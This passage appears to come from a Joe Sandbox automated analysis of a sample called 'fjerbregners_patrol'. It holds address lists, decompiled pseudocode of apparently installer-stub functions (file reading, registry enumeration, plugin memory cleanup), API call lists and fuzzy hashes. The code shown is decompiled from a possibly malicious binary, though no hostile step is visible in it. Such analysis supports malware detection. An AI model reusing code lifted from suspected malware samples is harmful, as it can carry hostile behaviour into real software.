                                                                                                                                                                                            0x004075e5
                                                                                                                                                                                            0x004075e5
                                                                                                                                                                                            0x00407616
                                                                                                                                                                                            0x00407619
                                                                                                                                                                                            0x0040761d
                                                                                                                                                                                            0x0040762a
                                                                                                                                                                                            0x00407585
                                                                                                                                                                                            0x00407585
                                                                                                                                                                                            0x00407589
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00407630
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00407630
                                                                                                                                                                                            0x0040762a
                                                                                                                                                                                            0x004074e9
                                                                                                                                                                                            0x004074eb
                                                                                                                                                                                            0x004074ed
                                                                                                                                                                                            0x004074f4
                                                                                                                                                                                            0x004074fa
                                                                                                                                                                                            0x004074fc
                                                                                                                                                                                            0x004074fe
                                                                                                                                                                                            0x00407501
                                                                                                                                                                                            0x00407508
                                                                                                                                                                                            0x00407508
                                                                                                                                                                                            0x00407512
                                                                                                                                                                                            0x004074e0
                                                                                                                                                                                            0x004074e0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00407514
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00407514
                                                                                                                                                                                            0x00407512
                                                                                                                                                                                            0x00407488
                                                                                                                                                                                            0x0040748f
                                                                                                                                                                                            0x00407491
                                                                                                                                                                                            0x00407497
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004071f3
                                                                                                                                                                                            0x004071f7
                                                                                                                                                                                            0x004071f7
                                                                                                                                                                                            0x004071fd
                                                                                                                                                                                            0x0040791f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040791f
                                                                                                                                                                                            0x00407203
                                                                                                                                                                                            0x00407207
                                                                                                                                                                                            0x0040720b
                                                                                                                                                                                            0x0040720d
                                                                                                                                                                                            0x0040720e
                                                                                                                                                                                            0x0040720f
                                                                                                                                                                                            0x00407213
                                                                                                                                                                                            0x0040721a
                                                                                                                                                                                            0x0040721e
                                                                                                                                                                                            0x00407225
                                                                                                                                                                                            0x00407228
                                                                                                                                                                                            0x0040722a
                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                            0x0040722f
                                                                                                                                                                                            0x00407231
                                                                                                                                                                                            0x00407231
                                                                                                                                                                                            0x00407231
                                                                                                                                                                                            0x00407235
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00407318
                                                                                                                                                                                            0x0040731d
                                                                                                                                                                                            0x00407929
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00407929
                                                                                                                                                                                            0x00407323
                                                                                                                                                                                            0x0040732a
                                                                                                                                                                                            0x0040732c
                                                                                                                                                                                            0x00407332
                                                                                                                                                                                            0x00407334
                                                                                                                                                                                            0x00407334
                                                                                                                                                                                            0x00407336
                                                                                                                                                                                            0x0040733d
                                                                                                                                                                                            0x00407344
                                                                                                                                                                                            0x00407346
                                                                                                                                                                                            0x00407349
                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                            0x0040734e
                                                                                                                                                                                            0x00407352
                                                                                                                                                                                            0x00407354
                                                                                                                                                                                            0x00407355
                                                                                                                                                                                            0x00407359
                                                                                                                                                                                            0x00407359
                                                                                                                                                                                            0x00407359
                                                                                                                                                                                            0x0040735d
                                                                                                                                                                                            0x00407361
                                                                                                                                                                                            0x00407365
                                                                                                                                                                                            0x00407367
                                                                                                                                                                                            0x00407368
                                                                                                                                                                                            0x0040736c
                                                                                                                                                                                            0x00407373
                                                                                                                                                                                            0x00407377
                                                                                                                                                                                            0x00407378
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00407665
                                                                                                                                                                                            0x00407670
                                                                                                                                                                                            0x00407677
                                                                                                                                                                                            0x00407679
                                                                                                                                                                                            0x0040767f
                                                                                                                                                                                            0x00407681
                                                                                                                                                                                            0x00407681
                                                                                                                                                                                            0x00407683
                                                                                                                                                                                            0x0040768a
                                                                                                                                                                                            0x00407691
                                                                                                                                                                                            0x00407694
                                                                                                                                                                                            0x00407697
                                                                                                                                                                                            0x00407699
                                                                                                                                                                                            0x0040769d
                                                                                                                                                                                            0x0040769f
                                                                                                                                                                                            0x004076a0
                                                                                                                                                                                            0x004076a4
                                                                                                                                                                                            0x004076a4
                                                                                                                                                                                            0x004076a4
                                                                                                                                                                                            0x004076a8
                                                                                                                                                                                            0x004076ac
                                                                                                                                                                                            0x004076ae
                                                                                                                                                                                            0x004076af
                                                                                                                                                                                            0x004076b3
                                                                                                                                                                                            0x004076b7
                                                                                                                                                                                            0x004076b8
                                                                                                                                                                                            0x004076bf
                                                                                                                                                                                            0x004076c3
                                                                                                                                                                                            0x004076c7
                                                                                                                                                                                            0x004076cb
                                                                                                                                                                                            0x004076d1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004076d3
                                                                                                                                                                                            0x004076d3
                                                                                                                                                                                            0x004076d3
                                                                                                                                                                                            0x004076d5
                                                                                                                                                                                            0x0040737c
                                                                                                                                                                                            0x00407380
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00407380
                                                                                                                                                                                            0x004076d1
                                                                                                                                                                                            0x0040794e
                                                                                                                                                                                            0x0040796a
                                                                                                                                                                                            0x00407975
                                                                                                                                                                                            0x00407977
                                                                                                                                                                                            0x00407978
                                                                                                                                                                                            0x0040797a
                                                                                                                                                                                            0x00407981
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406cdb
                                                                                                                                                                                            0x0040797e
                                                                                                                                                                                            0x0040797e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040797e
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: be01f2f5d6778d31e66423090296da9015e3113bf2d68f9762d35ea1fedf9486
                                                                                                                                                                                            • Instruction ID: 6cf1ab80e6c1b4aac19faaba9ec7866eaac58e75be9fff2148b640d87eadc954
                                                                                                                                                                                            • Opcode Fuzzy Hash: be01f2f5d6778d31e66423090296da9015e3113bf2d68f9762d35ea1fedf9486
                                                                                                                                                                                            • Instruction Fuzzy Hash: 05913571A0C7908BE364CF29C480B6BBBE1AFC9344F10892EE5DAE7390D7749805CB56
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 6EE81606 Relevance: 4.6, APIs: 3, Instructions: 123COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                            			E6EE81606(void* __ebx, void* __edx, void* __edi, void* __esi) {
				void* _t37;
				intOrPtr _t43;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t55;
				void* _t56;
				signed char _t62;
				signed int _t64;
				signed int _t66;
				struct HINSTANCE__* _t71;
				void* _t72;
				void* _t80;
				void* _t84;
				void* _t85;
				void* _t87;

				_t80 = __esi;
				_t72 = __edi;
				_t55 = __ebx;
				 *0x6ee85040 =  *((intOrPtr*)(_t87 + 8));
				 *0x6ee8503c =  *((intOrPtr*)(_t87 + 0x64));
				 *0x6ee85038 =  *((intOrPtr*)(_t87 + 0x60));
				 *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x6c)) + 0xc))( *0x6ee85014, E6EE812F7, _t84);
				_push("true");
				_t37 = E6EE82288();
				_t85 = _t37;
				if(_t85 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t85 + 4)) != 1) {
						E6EE81EDD(_t85);
					}
					E6EE81F58(_t85);
					if( *((intOrPtr*)(_t85 + 4)) == 0xffffffff) {
						L14:
						if(( *(_t85 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t85 + 4)) == 0) {
								_t37 = E6EE82128(_t85);
							} else {
								_push(_t55);
								_push(_t80);
								_push(_t72);
								_t64 = 8;
								_t14 = _t85 + 0x818; // 0x818
								_t56 = _t14;
								memcpy(_t87 + 0x14, _t56, _t64 << 2);
								_t43 = E6EE81E71(_t85, _t87 + 0x30);
								 *(_t85 + 0x834) =  *(_t85 + 0x834) & 0x00000000;
								 *((intOrPtr*)(_t85 + 0x820)) = _t43;
								 *_t56 = 3;
								E6EE82128(_t85);
								_t66 = 8;
								_t37 = memcpy(_t56, _t87 + 0x28, _t66 << 2);
							}
						} else {
							E6EE82128(_t85);
							_t37 = GlobalFree(E6EE8157E(E6EE815F4(_t85)));
						}
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							E6EE81F1F(_t85);
							_t62 =  *(_t85 + 0x810);
							_t37 = _t62;
							if((_t62 & 0x00000040) != 0 &&  *_t85 == 1) {
								_t71 =  *(_t85 + 0x808);
								if(_t71 != 0) {
									FreeLibrary(_t71);
									_t37 =  *(_t85 + 0x810);
								}
							}
							if((_t37 & 0x00000020) != 0) {
								_t37 = E6EE81558( *0x6ee8502c);
							}
						}
						if(( *(_t85 + 0x810) & 0x00000002) == 0) {
							_t37 = GlobalFree(_t85);
						}
						goto L28;
					}
					_t49 =  *_t85;
					if(_t49 == 0) {
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							goto L14;
						}
						E6EE82E4F(_t85);
						L12:
						_t85 = _t49;
						L13:
						goto L14;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						L8:
						_t49 = E6EE82BC4(_t85); // executed
						goto L12;
					}
					_t51 = _t50 - 1;
					if(_t51 == 0) {
						_push(_t85);
						E6EE81774();
						goto L13;
					}
					if(_t51 != 1) {
						goto L14;
					}
					goto L8;
				}
			}



















                                                                                                                                                                                            0x6ee81606
                                                                                                                                                                                            0x6ee81606
                                                                                                                                                                                            0x6ee81606
                                                                                                                                                                                            0x6ee8160d
                                                                                                                                                                                            0x6ee81616
                                                                                                                                                                                            0x6ee81620
                                                                                                                                                                                            0x6ee81634
                                                                                                                                                                                            0x6ee81637
                                                                                                                                                                                            0x6ee81639
                                                                                                                                                                                            0x6ee8163e
                                                                                                                                                                                            0x6ee81643
                                                                                                                                                                                            0x6ee8176f
                                                                                                                                                                                            0x6ee81773
                                                                                                                                                                                            0x6ee81649
                                                                                                                                                                                            0x6ee8164d
                                                                                                                                                                                            0x6ee81650
                                                                                                                                                                                            0x6ee81655
                                                                                                                                                                                            0x6ee81657
                                                                                                                                                                                            0x6ee81661
                                                                                                                                                                                            0x6ee81699
                                                                                                                                                                                            0x6ee816a0
                                                                                                                                                                                            0x6ee816c4
                                                                                                                                                                                            0x6ee81712
                                                                                                                                                                                            0x6ee816c6
                                                                                                                                                                                            0x6ee816c6
                                                                                                                                                                                            0x6ee816c7
                                                                                                                                                                                            0x6ee816c8
                                                                                                                                                                                            0x6ee816cb
                                                                                                                                                                                            0x6ee816d0
                                                                                                                                                                                            0x6ee816d0
                                                                                                                                                                                            0x6ee816dd
                                                                                                                                                                                            0x6ee816e0
                                                                                                                                                                                            0x6ee816e5
                                                                                                                                                                                            0x6ee816ed
                                                                                                                                                                                            0x6ee816f3
                                                                                                                                                                                            0x6ee816f9
                                                                                                                                                                                            0x6ee81709
                                                                                                                                                                                            0x6ee8170a
                                                                                                                                                                                            0x6ee8170e
                                                                                                                                                                                            0x6ee816a2
                                                                                                                                                                                            0x6ee816a3
                                                                                                                                                                                            0x6ee816b8
                                                                                                                                                                                            0x6ee816b8
                                                                                                                                                                                            0x6ee8171c
                                                                                                                                                                                            0x6ee8171f
                                                                                                                                                                                            0x6ee81725
                                                                                                                                                                                            0x6ee8172b
                                                                                                                                                                                            0x6ee81730
                                                                                                                                                                                            0x6ee81738
                                                                                                                                                                                            0x6ee81740
                                                                                                                                                                                            0x6ee81743
                                                                                                                                                                                            0x6ee81749
                                                                                                                                                                                            0x6ee81749
                                                                                                                                                                                            0x6ee81740
                                                                                                                                                                                            0x6ee81751
                                                                                                                                                                                            0x6ee81759
                                                                                                                                                                                            0x6ee8175e
                                                                                                                                                                                            0x6ee81751
                                                                                                                                                                                            0x6ee81766
                                                                                                                                                                                            0x6ee81769
                                                                                                                                                                                            0x6ee81769
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81766
                                                                                                                                                                                            0x6ee81666
                                                                                                                                                                                            0x6ee81669
                                                                                                                                                                                            0x6ee8168e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81691
                                                                                                                                                                                            0x6ee81696
                                                                                                                                                                                            0x6ee81696
                                                                                                                                                                                            0x6ee81698
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81698
                                                                                                                                                                                            0x6ee8166b
                                                                                                                                                                                            0x6ee8166e
                                                                                                                                                                                            0x6ee8167a
                                                                                                                                                                                            0x6ee8167b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee8167b
                                                                                                                                                                                            0x6ee81670
                                                                                                                                                                                            0x6ee81673
                                                                                                                                                                                            0x6ee81682
                                                                                                                                                                                            0x6ee81683
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81683
                                                                                                                                                                                            0x6ee81678
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81678

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 6EE82288: GlobalFree.KERNEL32(?), ref: 6EE82901
                                                                                                                                                                                              • Part of subcall function 6EE82288: GlobalFree.KERNEL32(?), ref: 6EE82907
                                                                                                                                                                                              • Part of subcall function 6EE82288: GlobalFree.KERNEL32(?), ref: 6EE8290D
                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6EE816B8
                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 6EE81743
                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6EE81769
                                                                                                                                                                                              • Part of subcall function 6EE81EDD: GlobalAlloc.KERNEL32(00000040,?), ref: 6EE81F0C
                                                                                                                                                                                              • Part of subcall function 6EE81774: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,6EE81688,00000000), ref: 6EE81817
                                                                                                                                                                                              • Part of subcall function 6EE81E71: wsprintfA.USER32 ref: 6EE81EA4
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3719184787.000000006EE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EE80000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3719111901.000000006EE80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719267839.000000006EE84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719390298.000000006EE86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6ee80000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3962662361-0
                                                                                                                                                                                            • Opcode ID: 6bcf6f7c9cd7e99e84c6bfa3f17525e45841d8540cb3861e5ae6e1a06fe3d482
                                                                                                                                                                                            • Instruction ID: 9ac0fc94d82ca23e70e37dba529989b8c618c0a389a6f3ae14e5908fd1940d6d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6bcf6f7c9cd7e99e84c6bfa3f17525e45841d8540cb3861e5ae6e1a06fe3d482
                                                                                                                                                                                            • Instruction Fuzzy Hash: A741C27141434A9FCB909FE89954BDB37ECBB02318F20891DE9AD5A281CB35994CDB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00402F57 Relevance: 4.6, APIs: 3, Instructions: 102COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                            			E00402F57(intOrPtr _a4) {
				signed int _t11;
				intOrPtr _t12;
				void* _t13;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t23;
				long _t29;
				long _t30;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t35;
				long _t36;
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t41;

				_t36 =  *0x40b52c; // 0xbc9c3
				_t38 = _t36 -  *0x40b528 + _a4;
				 *0x424000 = GetTickCount() + 0x1f4;
				if(_t38 <= 0) {
					L20:
					E004031F8("true");
					__eflags = 0;
					return 0;
				}
				E00402F40( *0x40b530);
				SetFilePointer( *0x40a014,  *0x40b528, 0, 0); // executed
				 *0x40b538 = _t38;
				 *0x40b53c = 0;
				while(1) {
					L15:
					_t39 =  *0x40b534; // 0x795bd
					_t41 =  >  ? 0x4000 : _t39 -  *0x40b530;
					_t11 = E00402F2A(0x4135d0, _t41);
					if(_t11 == 0) {
						break;
					}
					 *0x40b530 =  *0x40b530 + _t41;
					__eflags =  *0x40b530;
					 *0x40b560 = 0x4135d0;
					 *0x40b564 = _t41;
					while(1) {
						__eflags =  *0x424010;
						if( *0x424010 != 0) {
							__eflags =  *0x4240e0;
							if( *0x4240e0 == 0) {
								_t20 =  *0x40b538; // 0x279e
								_t23 = _t20 -  *0x40b52c - _a4 + _t29;
								__eflags = _t23;
								 *0x40b53c = _t23;
								E004031F8(0);
							}
						}
						 *0x40b568 = 0x4175d0;
						 *0x40b56c = 0x8000;
						_t12 = E00406C36(0x40b548);
						__eflags = _t12;
						if(_t12 < 0) {
							break;
						}
						_t34 =  *0x40b568; // 0x419d6e
						_t35 = _t34 - 0x4175d0;
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x40b564; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags = _t41;
							if(_t41 == 0) {
								break;
							}
							_t29 =  *0x40b528; // 0xbc9c3
							L14:
							_t32 =  *0x40b52c; // 0xbc9c3
							__eflags = _t32 - _t29 + _a4;
							if(_t32 - _t29 + _a4 <= 0) {
								SetFilePointer( *0x40a014, _t32, 0, 0); // executed
								goto L20;
							}
							goto L15;
						}
						_t19 = E00406806(0x40b548,  *0x40a014, 0x4175d0, _t35); // executed
						__eflags = _t19;
						if(_t19 == 0) {
							_push(0xfffffffe);
							L18:
							_pop(_t13);
							return _t13;
						}
						_t30 =  *0x40b528; // 0xbc9c3
						_t29 = _t30 + _t35;
						 *0x40b528 = _t29;
						__eflags =  *0x40b564; // 0x0
						if(__eflags != 0) {
							continue;
						}
						goto L14;
					}
					_push(0xfffffffd);
					goto L18;
				}
				return _t11 | 0xffffffff;
			}


















                                                                                                                                                                                            0x00402f59
                                                                                                                                                                                            0x00402f65
                                                                                                                                                                                            0x00402f75
                                                                                                                                                                                            0x00402f7c
                                                                                                                                                                                            0x004030c2
                                                                                                                                                                                            0x004030c4
                                                                                                                                                                                            0x004030ca
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004030ca
                                                                                                                                                                                            0x00402f88
                                                                                                                                                                                            0x00402f9d
                                                                                                                                                                                            0x00402fa3
                                                                                                                                                                                            0x00402fa9
                                                                                                                                                                                            0x0040307f
                                                                                                                                                                                            0x0040307f
                                                                                                                                                                                            0x0040307f
                                                                                                                                                                                            0x00403097
                                                                                                                                                                                            0x0040309c
                                                                                                                                                                                            0x004030a3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402fb4
                                                                                                                                                                                            0x00402fb4
                                                                                                                                                                                            0x00402fc0
                                                                                                                                                                                            0x00402fc6
                                                                                                                                                                                            0x00402fcc
                                                                                                                                                                                            0x00402fcc
                                                                                                                                                                                            0x00402fd2
                                                                                                                                                                                            0x00402fd4
                                                                                                                                                                                            0x00402fda
                                                                                                                                                                                            0x00402fdc
                                                                                                                                                                                            0x00402feb
                                                                                                                                                                                            0x00402feb
                                                                                                                                                                                            0x00402fee
                                                                                                                                                                                            0x00402ff3
                                                                                                                                                                                            0x00402ff8
                                                                                                                                                                                            0x00402fda
                                                                                                                                                                                            0x00402ffe
                                                                                                                                                                                            0x00403008
                                                                                                                                                                                            0x00403012
                                                                                                                                                                                            0x00403017
                                                                                                                                                                                            0x00403019
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040301f
                                                                                                                                                                                            0x0040302a
                                                                                                                                                                                            0x0040302a
                                                                                                                                                                                            0x0040302c
                                                                                                                                                                                            0x0040305b
                                                                                                                                                                                            0x00403061
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403063
                                                                                                                                                                                            0x00403065
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403067
                                                                                                                                                                                            0x0040306d
                                                                                                                                                                                            0x0040306d
                                                                                                                                                                                            0x0040307b
                                                                                                                                                                                            0x0040307d
                                                                                                                                                                                            0x004030bc
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004030bc
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040307d
                                                                                                                                                                                            0x00403036
                                                                                                                                                                                            0x0040303b
                                                                                                                                                                                            0x0040303d
                                                                                                                                                                                            0x004030ae
                                                                                                                                                                                            0x004030b0
                                                                                                                                                                                            0x004030b0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004030b0
                                                                                                                                                                                            0x0040303f
                                                                                                                                                                                            0x00403045
                                                                                                                                                                                            0x00403047
                                                                                                                                                                                            0x0040304d
                                                                                                                                                                                            0x00403053
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403059
                                                                                                                                                                                            0x004030d2
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004030d2
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402F6A
                                                                                                                                                                                              • Part of subcall function 00402F40: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004034D8,?), ref: 00402F4E
                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00403106,00000004,C:\Users\user\Desktop,?,00000000,00403504,000000FF,00000000,00000000,?,?), ref: 00402F9D
                                                                                                                                                                                            • SetFilePointer.KERNELBASE(000BC9C3,00000000,00000000,004135D0,-00391F73,?,00403106,00000004,C:\Users\user\Desktop,?,00000000,00403504,000000FF,00000000,00000000,?), ref: 004030BC
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FilePointer$CountTick
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1092082344-0
                                                                                                                                                                                            • Opcode ID: c0e5ccca8257f841dd56d82c20e57ea17a383a45caef7f86d12dffc3dc1da5c0
                                                                                                                                                                                            • Instruction ID: 67912e305ddd3318a6ca64883585a09802bb667de79b874f5a695d0529a3d535
                                                                                                                                                                                            • Opcode Fuzzy Hash: c0e5ccca8257f841dd56d82c20e57ea17a383a45caef7f86d12dffc3dc1da5c0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D315C71602215ABC7209F29FF049263BA8EB457A9710417BE900B33F4DB789841DF9D
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004027A0 Relevance: 4.6, APIs: 3, Instructions: 54registryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                            			E004027A0(char __ebx) {
				void* _t8;
				void* _t15;
				void* _t17;
				char* _t21;
				void* _t25;

				_t8 = E00402ED0(_t15, _t17, _t25, 0x20019); // executed
				E00402E56(3);
				 *_t21 = __ebx;
				if(_t8 != 0) {
					__ecx = 0x3ff;
					 *(__esp + 0x54) = 0x3ff;
					__eflags =  *((intOrPtr*)(__esp + 0x38)) - __ebx;
					if( *((intOrPtr*)(__esp + 0x38)) == __ebx) {
						__ecx = __esp + 0x64;
						__eax = RegEnumValueA(__esi, __eax, __ebp, __esp + 0x64, __ebx, __ebx, __ebx, __ebx);
						__ecx =  *(__esp + 0x10);
						0 = 1;
						__eflags = __eax;
						__ecx =  !=  ? 1 :  *(__esp + 0x10);
						 *(__esp + 0x10) =  !=  ? 1 :  *(__esp + 0x10);
					} else {
						__eax = RegEnumKeyA(__esi, __eax, __ebp, 0x3ff);
					}
					__ebp[0x3ff] = __bl;
					_push(__esi);
					__eax = RegCloseKey(); // executed
					__eax =  *(__esp + 0x10);
				}
				 *0x4240c8 =  *0x4240c8 + 1;
				return 0;
			}








                                                                                                                                                                                            0x004027a5
                                                                                                                                                                                            0x004027ae
                                                                                                                                                                                            0x004027b3
                                                                                                                                                                                            0x004027b9
                                                                                                                                                                                            0x004027bf
                                                                                                                                                                                            0x004027c4
                                                                                                                                                                                            0x004027c8
                                                                                                                                                                                            0x004027cc
                                                                                                                                                                                            0x004027de
                                                                                                                                                                                            0x004027e6
                                                                                                                                                                                            0x004027ec
                                                                                                                                                                                            0x004027f2
                                                                                                                                                                                            0x004027f3
                                                                                                                                                                                            0x004027f5
                                                                                                                                                                                            0x004027f8
                                                                                                                                                                                            0x004027ce
                                                                                                                                                                                            0x004027d2
                                                                                                                                                                                            0x004027d2
                                                                                                                                                                                            0x00402773
                                                                                                                                                                                            0x0040279a
                                                                                                                                                                                            0x0040270b
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x00402d12

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsm8742.tmp,?,?,00000011,00000002), ref: 0040270B
                                                                                                                                                                                            • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004027D2
                                                                                                                                                                                            • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004027E6
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
